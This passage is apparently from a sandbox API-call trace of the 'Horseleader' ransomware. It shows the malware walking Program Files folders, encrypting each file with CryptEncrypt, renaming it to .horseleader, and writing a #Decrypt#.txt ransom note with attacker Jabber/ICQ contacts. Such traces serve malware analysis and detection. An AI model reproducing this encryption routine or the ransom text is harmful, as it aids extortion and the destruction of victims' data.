pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.horseleader") returned 92 [0247.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.horseleader")) returned 1 [0247.573] GetProcessHeap () returned 0x780000 [0247.573] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.574] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.574] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.574] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\#Decrypt#.txt") returned 81 [0247.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.574] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.574] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.576] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.576] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.576] CloseHandle (hObject=0x158) returned 1 [0247.576] GetProcessHeap () returned 0x780000 [0247.576] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.576] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="QUAD", cAlternateFileName="")) returned 1 [0247.576] lstrcmpiW (lpString1="QUAD", lpString2="Windows") returned -1 [0247.576] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD") returned 64 [0247.576] lstrcmpW (lpString1="QUAD", lpString2=".") returned 1 [0247.576] lstrcmpW (lpString1="QUAD", lpString2="..") returned 1 [0247.576] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.576] GetProcessHeap () returned 0x780000 [0247.576] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*") returned 66 [0247.577] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.577] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\.") returned 66 [0247.577] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.577] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\..") returned 67 [0247.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.577] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x59f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.577] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 76 [0247.577] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.578] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.578] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.578] lstrlenW (lpString=".testttjffg") returned 11 [0247.578] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.579] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 76 [0247.579] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.579] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1439) returned 1 [0247.579] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x59f, lpOverlapped=0x0) returned 1 [0247.581] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x59f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x59f, lpOverlapped=0x0) returned 1 [0247.582] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.582] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.582] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.582] CloseHandle (hObject=0x1a4) returned 1 [0247.582] GetProcessHeap () returned 0x780000 [0247.582] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.582] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.horseleader") returned 88 [0247.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.horseleader")) returned 1 [0247.583] GetProcessHeap () returned 0x780000 [0247.583] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.583] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b366a00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a8037d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b366a00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xbba7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="QUAD.ELM", cAlternateFileName="")) returned 1 [0247.583] lstrcmpiW (lpString1="QUAD.ELM", lpString2="Windows") returned -1 [0247.583] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM") returned 73 [0247.583] StrStrIW (lpFirst="QUAD.ELM", lpSrch=".horseleader") returned 0x0 [0247.583] lstrcmpW (lpString1="QUAD.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.583] lstrcmpW (lpString1="QUAD.ELM", lpString2="_uninstalling_.png") returned 1 [0247.583] lstrlenW (lpString=".testttjffg") returned 11 [0247.583] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM", lpSrch=".testttjffg") returned 0x0 [0247.583] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.584] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.585] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM") returned 73 [0247.585] StrStrW (lpFirst="QUAD.ELM", lpSrch=".txt") returned 0x0 [0247.585] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=48039) returned 1 [0247.585] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.590] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.591] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.591] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.591] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.592] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1ba7, lpOverlapped=0x0) returned 1 [0247.592] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe459, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1ba7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1ba7, lpOverlapped=0x0) returned 1 [0247.592] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.593] CloseHandle (hObject=0x1a4) returned 1 [0247.593] GetProcessHeap () returned 0x780000 [0247.593] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.593] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM.horseleader") returned 85 [0247.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.elm.horseleader")) returned 1 [0247.596] GetProcessHeap () returned 0x780000 [0247.596] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.596] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="QUAD.INF", cAlternateFileName="")) returned 1 [0247.596] lstrcmpiW (lpString1="QUAD.INF", lpString2="Windows") returned -1 [0247.596] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF") returned 73 [0247.596] StrStrIW (lpFirst="QUAD.INF", lpSrch=".horseleader") returned 0x0 [0247.596] lstrcmpW (lpString1="QUAD.INF", lpString2="#Decrypt#.txt") returned 1 [0247.597] lstrcmpW (lpString1="QUAD.INF", lpString2="_uninstalling_.png") returned 1 [0247.597] lstrlenW (lpString=".testttjffg") returned 11 [0247.597] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF", lpSrch=".testttjffg") returned 0x0 [0247.597] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.597] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.599] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF") returned 73 [0247.599] StrStrW (lpFirst="QUAD.INF", lpSrch=".txt") returned 0x0 [0247.599] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=600) returned 1 [0247.599] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x258, lpOverlapped=0x0) returned 1 [0247.600] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffda8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.600] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x258, lpOverlapped=0x0) returned 1 [0247.600] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.601] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.601] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.601] CloseHandle (hObject=0x1a4) returned 1 [0247.601] GetProcessHeap () returned 0x780000 [0247.601] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.601] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF.horseleader") returned 85 [0247.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.inf.horseleader")) returned 1 [0247.602] GetProcessHeap () returned 0x780000 [0247.602] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.602] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x90f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.602] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.602] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 77 [0247.602] StrStrIW (lpFirst="THMBNAIL.PNG", 